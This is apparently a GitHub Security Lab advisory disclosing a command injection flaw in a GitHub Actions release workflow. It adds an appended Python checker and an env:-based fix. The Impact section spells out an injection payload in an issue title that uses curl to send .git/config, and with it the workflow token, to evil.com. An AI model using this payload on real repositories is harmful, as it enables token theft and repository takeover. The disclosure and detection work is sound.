Coordinated Disclosure Timeline
- 10/16/2020: Report sent to vendor
- 10/17/2020: Issue fixed
Summary
The ‘draft-new-release.yml’ GitHub workflow is potentially vulnerable to arbitrary command injection, which may lead to the repository being compromised.
Product
thomaseizinger/github-action-gitflow-release-workflow GitHub repository
Tested Version
draft-new-release.yml from the dev branch.
Details
Issue: The body of a public GitHub issue is used to format a shell command
When a user creates a public issue whose title begins with 'Release version', it automatically starts the draft-new-release.yml GitHub workflow. The title of the issue is used to format a bash script.
    # Only run for issues with a specific title and label. Not strictly required but makes finding the release issue again later easier.
    # There is also a whitelist that you may want to use to restrict, who can trigger this workflow.
    # Unfortunately, we cannot create an array on the fly, so the whitelist is just comma-separated.
    if: startsWith(github.event.issue.title, 'Release version') && contains(github.event.issue.labels.*.name, 'release') && contains('thomaseizinger,yourusername', github.event.issue.user.login)
    steps:
      - uses: actions/checkout@v2
      - name: Extract version from issue title
        run: |
          TITLE="${{ github.event.issue.title }}"
          VERSION=${TITLE#Release version }
There are two safeguards to prevent random users from triggering the workflow: a user login name check and a label check.
The login name check is bypassable with any user name that is a substring of 'thomaseizinger,yourusername', such as 'eizi', 'thom', etc.
The label check is the only one that prevents exploitation, but it may be removed accidentally in the future. There is even a comment that indicates it is "Not strictly required".
Impact
This vulnerability allows for arbitrary command injection into the bash script. For example, a user may create an issue with the title 'Release version"; curl -d @.git/config http://evil.com; sleep 10 #', which will exfiltrate the temporary GitHub repository authorization token to the attacker-controlled server. Although the token is no longer valid after the workflow finishes, since the attacker controls the execution of the workflow he or she can delay it to give the malicious server time to modify the repository.
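The injection works because a ${{ }} expression is substituted into the run: script text before bash ever parses it, so the usual mitigation is to pass the value through env: and let bash read it as a variable. As an added example (not code from the advisory or from the repository), a small Python checker that flags ${{ }} expressions reading attacker-controllable contexts inside run: blocks; it embeds the vulnerable step from the advisory and an assumed hardened rewrite as constructed inputs, and its list of untrusted contexts is an illustrative subset.

```python
import re

# Contexts an outside contributor can set (illustrative subset; extend as needed).
UNTRUSTED_CONTEXTS = (
    "github.event.issue.title",
    "github.event.issue.body",
    "github.event.pull_request.title",
    "github.event.pull_request.body",
    "github.event.comment.body",
    "github.head_ref",
)

EXPR = re.compile(r"\$\{\{\s*([^}]+?)\s*\}\}")  # one ${{ expression }}


def untrusted_expressions_in_run(workflow_text):
    """Return (line_no, expression) for each ${{ }} inside a `run:` scalar that
    reads an untrusted context. Uses an indentation-based reader of `run:` blocks
    so no YAML library is needed; `${{ }}` under `env:` is deliberately not flagged,
    because an environment variable is not re-parsed as script text by bash."""
    findings = []
    in_run, run_indent = False, -1
    for no, line in enumerate(workflow_text.splitlines(), 1):
        stripped = line.lstrip()
        indent = len(line) - len(stripped)
        if in_run and stripped and indent <= run_indent:
            in_run = False  # back at a sibling key, the block scalar ended
        m = re.match(r"run:\s*(.*)$", stripped)
        if m:
            in_run, run_indent, body = True, indent, m.group(1)  # inline `run: cmd`
        elif in_run:
            body = stripped
        else:
            continue
        for expr in EXPR.findall(body):
            if any(expr.startswith(ctx) for ctx in UNTRUSTED_CONTEXTS):
                findings.append((no, expr))
    return findings


# Constructed inputs: the step from the advisory, and an assumed hardened rewrite.
VULNERABLE_STEP = """\
      - name: Extract version from issue title
        run: |
          TITLE="${{ github.event.issue.title }}"
          VERSION=${TITLE#Release version }
"""

HARDENED_STEP = """\
      - name: Extract version from issue title
        env:
          TITLE: ${{ github.event.issue.title }}
        run: |
          VERSION=${TITLE#Release version }
"""
```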
Credit
This issue was discovered and reported by GHSL team member @JarLob (Jaroslav Lobačevski).
Contact
You can contact the GHSL team at securitylab@github.com, please include a reference to GHSL-2020-186 in any communication regarding this issue.